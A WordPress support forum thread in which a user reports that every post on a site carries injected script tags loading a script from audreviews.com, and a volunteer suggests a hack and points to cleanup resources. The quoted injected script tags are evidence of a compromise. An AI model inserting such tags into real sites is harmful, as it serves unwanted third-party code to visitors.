JS library injected from audreviews.com

Resolved torcual
(@torcual)

9 years, 9 months ago
Hi everyone,

I am reviewing a WordPress site, and it seems that every blog post is injected with the following snippet:
```
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<script src="http://www.audreviews.com/js/jquery.box.js"></script>
```
The referenced library then tries to load an iframe with advertising.

Does anyone know how to eliminate this kind of JS injection? Does anyone know how this infection was catched?

Thank you!

Alex

Viewing 8 replies - 1 through 8 (of 8 total)

Andrew Nevins
(@anevins)

WCLDN 2018 Contributor | Volunteer support

9 years, 9 months ago

Maybe that’s just the symptom of a hack, where your main concern would be to destroy any backdoors left by the hacker instead of removing the advert.

Andrew Nevins
(@anevins)

WCLDN 2018 Contributor | Volunteer support

9 years, 9 months ago

But then it may be part of your theme/ plugins.

Andrew Nevins
(@anevins)

WCLDN 2018 Contributor | Volunteer support

9 years, 9 months ago

Which theme and plugins are you using?
Thread Starter torcual
(@torcual)

9 years, 9 months ago
Andrew, thank you for replying. As far as I can tell (I have close to zero familiarity with WordPress), the plugins are:
- Akismet v2.5.6 (v3.0.0 available)
- Breadcrumb NavXT v4.2.0
- Contact Form 7 v3.3.1
- Custom Post Templates v1.5
- Get-a-Post vR1.4
- Hyper Cache v2.9.0.3 (v2.9.1.6 available)
- Page Links To v2.7.1 (v2.9.3 available)
- qTranslate 2.5.30
- Sociable for WordPress 3.0 v5.13
- TablePress v1.0
- the_excerptReloaded vR1
- WordPress Multiligual Sitemap v0.1
And current theme is ApertureTheme v2.4.3 by WooThemes (which seems to be discontinued, as I just found out).

WordPress version is 3.4.

As I write these lines I am realizing that this installation seems a bit outdated. Would an upgrade make sense?

Cheers,

Alex
Andrew Nevins
(@anevins)

WCLDN 2018 Contributor | Volunteer support

9 years, 9 months ago

Is your site http://www.audreviews.com/ ?

Thread Starter torcual
(@torcual)

9 years, 9 months ago

Hi Andrew, no, it’s not this site.

Andrew Nevins
(@anevins)

WCLDN 2018 Contributor | Volunteer support

9 years, 9 months ago

Do you know whether all of those plugins were downloaded from the WordPress.org repository? I can’t find “Get-a-Post” for example, and I’m checking this because you can guarantee any plugin from the WordPress repository will not be responsible (as they have been reviewed before being distributed.

But it does seem like that website has been hacked and unfortunately there’s a lot of manual work involved in delousing a hacked site.

You need to start working your way through these resources:

http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Additional Resources:

http://sitecheck.sucuri.net/scanner/
http://www.unmaskparasites.com/
http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html

Thread Starter torcual
(@torcual)

9 years, 9 months ago

Andrew, I will start the process for recovering this site. Thank you for such a prompt reply! –Alex

Viewing 8 replies - 1 through 8 (of 8 total)

The topic ‘JS library injected from audreviews.com’ is closed to new replies.

JS library injected from audreviews.com

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics